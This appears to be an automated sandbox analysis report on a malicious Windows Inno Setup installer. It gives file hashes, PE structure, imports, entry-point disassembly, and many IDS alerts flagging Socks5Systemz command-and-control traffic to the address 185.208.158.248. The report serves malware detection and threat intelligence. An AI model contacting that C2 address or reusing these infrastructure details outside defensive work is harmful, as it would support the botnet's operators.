                                                            Encrypted:false
                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\is-A9OKS.tmp\AyiNxJ98mL.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Category:dropped
                                                            Size (bytes):23312
                                                            Entropy (8bit):4.596242908851566
                                                            Encrypted:false
                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.998848551929596
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                            • Inno Setup installer (109748/4) 1.08%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            File name:AyiNxJ98mL.exe
                                                            File size:5'031'933 bytes
                                                            MD5:1d579066d7524921e14164ea1e9a9807
                                                            SHA1:a0f9d2a55afce02d9c42374c15f01b24ee9cdbdc
                                                            SHA256:6d6e762217ce4e36515634b7d8a420d8a752a1b430376df118ba2d178fcce61e
                                                            SHA512:cbcedce34e79dc83862f6d4fa1aa65be474e6df555334773ec369f0fa30c18b10fabcbca3c6c8d77d5c59f4a144fa4d9fa052893096bfe5e4c5392d18efcf22a
                                                            SSDEEP:98304:NXZ9vqS54XV9+jC1lwbaR+C688rzD0HuLpe14XXnAWpT3iORd/:cS0V9+yCaKJD0ipe14NpTBRR
                                                            TLSH:FB363302E17835B0D2A089755BF9D75C2AF27B4D4E396ACDF08DA26F9BEE404F149603
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                            Icon Hash:2d2e3797b32b2b99
                                                            Entrypoint:0x409c40
                                                            Entrypoint Section:CODE
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:1
                                                            OS Version Minor:0
                                                            File Version Major:1
                                                            File Version Minor:0
                                                            Subsystem Version Major:1
                                                            Subsystem Version Minor:0
                                                            Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFC4h
                                                            push ebx
                                                            push esi
                                                            push edi
                                                            xor eax, eax
                                                            mov dword ptr [ebp-10h], eax
                                                            mov dword ptr [ebp-24h], eax
                                                            call 00007F9B7CEEDFDBh
                                                            call 00007F9B7CEEF1E2h
                                                            call 00007F9B7CEEF471h
                                                            call 00007F9B7CEF14A8h
                                                            call 00007F9B7CEF14EFh
                                                            call 00007F9B7CEF3E1Eh
                                                            call 00007F9B7CEF3F85h
                                                            xor eax, eax
                                                            push ebp
                                                            push 0040A2FCh
                                                            push dword ptr fs:[eax]
                                                            mov dword ptr fs:[eax], esp
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040A2C5h
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            mov eax, dword ptr [0040C014h]
                                                            call 00007F9B7CEF49EBh
                                                            call 00007F9B7CEF461Eh
                                                            lea edx, dword ptr [ebp-10h]
                                                            xor eax, eax
                                                            call 00007F9B7CEF1AD8h
                                                            mov edx, dword ptr [ebp-10h]
                                                            mov eax, 0040CE24h
                                                            call 00007F9B7CEEE087h
                                                            push 00000002h
                                                            push 00000000h
                                                            push 00000001h
                                                            mov ecx, dword ptr [0040CE24h]
                                                            mov dl, 01h
                                                            mov eax, 0040738Ch
                                                            call 00007F9B7CEF2367h
                                                            mov dword ptr [0040CE28h], eax
                                                            xor edx, edx
                                                            push ebp
                                                            push 0040A27Dh
                                                            push dword ptr fs:[edx]
                                                            mov dword ptr fs:[edx], esp
                                                            call 00007F9B7CEF4A5Bh
                                                            mov dword ptr [0040CE30h], eax
                                                            mov eax, dword ptr [0040CE30h]
                                                            cmp dword ptr [eax+0Ch], 01h
                                                            jne 00007F9B7CEF4B9Ah
                                                            mov eax, dword ptr [0040CE30h]
                                                            mov edx, 00000028h
                                                            call 00007F9B7CEF2768h
                                                            mov edx, dword ptr [00000030h]
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            CODE0x10000x93640x94002c410dfc3efd04d9b69c35c70921424eFalse0.6147856841216216data6.560885192755103IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            DATA0xb0000x24c0x400d5ea23d4ecf110fd2591314cbaa84278False0.310546875data2.7390956346874638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            BSS0xc0000xe880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .rsrc0x110000x2c000x2c00123a08cfa434f3acd5a02b9062940882False0.32279829545454547data4.460842828894219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                            RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                            RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                            RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                            RT_STRING0x125740x2f2data0.35543766578249336
                                                            RT_STRING0x128680x30cdata0.3871794871794872
                                                            RT_STRING0x12b740x2cedata0.42618384401114207
                                                            RT_STRING0x12e440x68data0.75
                                                            RT_STRING0x12eac0xb4data0.6277777777777778
                                                            RT_STRING0x12f600xaedata0.5344827586206896
                                                            RT_RCDATA0x130100x2cdata1.2045454545454546
                                                            RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                            RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.27566225165562913
                                                            RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093
                                                            DLLImport
                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                            user32.dllMessageBoxA
                                                            oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                            kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                            user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                            comctl32.dllInitCommonControls
                                                            advapi32.dllAdjustTokenPrivileges
                                                            Language of compilation systemCountry where language is spokenMap
                                                            DutchNetherlands
                                                            EnglishUnited States
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-07T03:41:58.187837+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:41:58.187837+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:42:01.054787+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:42:01.054787+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:42:01.407698+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:42:01.407698+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449747185.208.158.24880TCP
                                                            2024-10-07T03:42:02.230670+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449776185.208.158.24880TCP
                                                            2024-10-07T03:42:02.230670+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449776185.208.158.24880TCP
                                                            2024-10-07T03:42:03.108012+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449782185.208.158.24880TCP
                                                            2024-10-07T03:42:03.108012+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449782185.208.158.24880TCP
                                                            2024-10-07T03:42:03.949540+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449788185.208.158.24880TCP
                                                            2024-10-07T03:42:03.949540+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449788185.208.158.24880TCP
                                                            2024-10-07T03:42:04.766868+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449794185.208.158.24880TCP
                                                            2024-10-07T03:42:04.766868+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449794185.208.158.24880TCP
                                                            2024-10-07T03:42:05.592224+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449800185.208.158.24880TCP
                                                            2024-10-07T03:42:05.592224+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449800185.208.158.24880TCP
                                                            2024-10-07T03:42:06.406519+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449806185.208.158.24880TCP
                                                            2024-10-07T03:42:06.406519+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449806185.208.158.24880TCP
                                                            2024-10-07T03:42:07.223683+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449812185.208.158.24880TCP
                                                            2024-10-07T03:42:07.223683+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449812185.208.158.24880TCP
                                                            2024-10-07T03:42:08.069514+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449818185.208.158.24880TCP
                                                            2024-10-07T03:42:08.069514+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449818185.208.158.24880TCP
                                                            2024-10-07T03:42:08.427179+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449818185.208.158.24880TCP
                                                            2024-10-07T03:42:08.427179+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449818185.208.158.24880TCP
                                                            2024-10-07T03:42:09.260724+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449827185.208.158.24880TCP
                                                            2024-10-07T03:42:09.260724+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449827185.208.158.24880TCP
                                                            2024-10-07T03:42:10.075961+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449832185.208.158.24880TCP
                                                            2024-10-07T03:42:10.075961+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449832185.208.158.24880TCP
                                                            2024-10-07T03:42:10.887152+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449837185.208.158.24880TCP
                                                            2024-10-07T03:42:10.887152+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449837185.208.158.24880TCP
                                                            2024-10-07T03:42:11.728146+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449842185.208.158.24880TCP
                                                            2024-10-07T03:42:11.728146+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449842185.208.158.24880TCP
                                                            2024-10-07T03:42:12.076820+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449842185.208.158.24880TCP
                                                            2024-10-07T03:42:12.076820+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449842185.208.158.24880TCP
                                                            2024-10-07T03:42:12.952536+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449852185.208.158.24880TCP
                                                            2024-10-07T03:42:12.952536+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449852185.208.158.24880TCP
                                                            2024-10-07T03:42:13.773176+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449857185.208.158.24880TCP
                                                            2024-10-07T03:42:13.773176+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449857185.208.158.24880TCP
                                                            2024-10-07T03:42:14.638684+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449863185.208.158.24880TCP
                                                            2024-10-07T03:42:14.638684+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449863185.208.158.24880TCP
                                                            2024-10-07T03:42:15.469770+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449869185.208.158.24880TCP
                                                            2024-10-07T03:42:15.469770+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449869185.208.158.24880TCP
                                                            2024-10-07T03:42:16.322119+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449876185.208.158.24880TCP
                                                            2024-10-07T03:42:16.322119+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449876185.208.158.24880TCP
                                                            2024-10-07T03:42:17.183704+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449883185.208.158.24880TCP
                                                            2024-10-07T03:42:17.183704+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449883185.208.158.24880TCP
                                                            2024-10-07T03:42:18.017782+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449890185.208.158.24880TCP
                                                            2024-10-07T03:42:18.017782+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449890185.208.158.24880TCP
                                                            2024-10-07T03:42:18.834612+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:18.834612+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:19.197405+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:19.197405+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:19.542074+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:19.542074+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449896185.208.158.24880TCP
                                                            2024-10-07T03:42:20.386996+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449904185.208.158.24880TCP
                                                            2024-10-07T03:42:20.386996+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449904185.208.158.24880TCP
                                                            2024-10-07T03:42:21.218189+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449908185.208.158.24880TCP
                                                            2024-10-07T03:42:21.218189+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449908185.208.158.24880TCP
                                                            2024-10-07T03:42:22.031745+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449911185.208.158.24880TCP
                                                            2024-10-07T03:42:22.031745+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449911185.208.158.24880TCP
                                                            2024-10-07T03:42:22.840581+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449915185.208.158.24880TCP
                                                            2024-10-07T03:42:22.840581+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449915185.208.158.24880TCP
                                                            2024-10-07T03:42:23.794239+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449920185.208.158.24880TCP
                                                            2024-10-07T03:42:23.794239+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449920185.208.158.24880TCP
                                                            2024-10-07T03:42:24.614613+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449926185.208.158.24880TCP
                                                            2024-10-07T03:42:24.614613+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449926185.208.158.24880TCP
                                                            2024-10-07T03:42:25.438023+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449933185.208.158.24880TCP
                                                            2024-10-07T03:42:25.438023+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449933185.208.158.24880TCP
                                                            2024-10-07T03:42:26.264367+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449940185.208.158.24880TCP
                                                            2024-10-07T03:42:26.264367+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449940185.208.158.24880TCP
                                                            2024-10-07T03:42:27.067852+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449946185.208.158.24880TCP
                                                            2024-10-07T03:42:27.067852+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449946185.208.158.24880TCP
                                                            2024-10-07T03:42:27.897107+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449952185.208.158.24880TCP
                                                            2024-10-07T03:42:27.897107+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449952185.208.158.24880TCP
                                                            2024-10-07T03:42:28.251909+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449952185.208.158.24880TCP
                                                            2024-10-07T03:42:28.251909+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449952185.208.158.24880TCP
                                                            2024-10-07T03:42:29.068086+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449961185.208.158.24880TCP
                                                            2024-10-07T03:42:29.068086+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449961185.208.158.24880TCP
                                                            2024-10-07T03:42:29.419270+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449961185.208.158.24880TCP
                                                            2024-10-07T03:42:29.419270+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449961185.208.158.24880TCP
                                                            2024-10-07T03:42:30.236178+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449969185.208.158.24880TCP
                                                            2024-10-07T03:42:30.236178+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449969185.208.158.24880TCP
                                                            2024-10-07T03:42:31.050989+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449975185.208.158.24880TCP
                                                            2024-10-07T03:42:31.050989+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449975185.208.158.24880TCP
                                                            2024-10-07T03:42:31.860240+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449982185.208.158.24880TCP
                                                            2024-10-07T03:42:31.860240+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449982185.208.158.24880TCP
                                                            2024-10-07T03:42:32.690546+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449989185.208.158.24880TCP
                                                            2024-10-07T03:42:32.690546+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449989185.208.158.24880TCP
                                                            2024-10-07T03:42:33.492195+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449996185.208.158.24880TCP
                                                            2024-10-07T03:42:33.492195+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449996185.208.158.24880TCP
                                                            2024-10-07T03:42:33.836058+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.449996185.208.158.24880TCP
                                                            2024-10-07T03:42:33.836058+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.449996185.208.158.24880TCP
                                                            2024-10-07T03:42:34.679019+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450003185.208.158.24880TCP
                                                            2024-10-07T03:42:34.679019+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450003185.208.158.24880TCP
                                                            2024-10-07T03:42:35.476473+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:35.476473+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:35.820016+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:35.820016+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:36.169186+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:36.169186+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450009185.208.158.24880TCP
                                                            2024-10-07T03:42:36.973944+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450020185.208.158.24880TCP
                                                            2024-10-07T03:42:36.973944+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450020185.208.158.24880TCP
                                                            2024-10-07T03:42:37.838645+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450026185.208.158.24880TCP
                                                            2024-10-07T03:42:37.838645+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450026185.208.158.24880TCP
                                                            2024-10-07T03:42:38.705866+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.450034185.208.158.24880TCP
                                                            2024-10-07T03:42:38.705866+02002050112ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.450034185.208.158.24880TCP
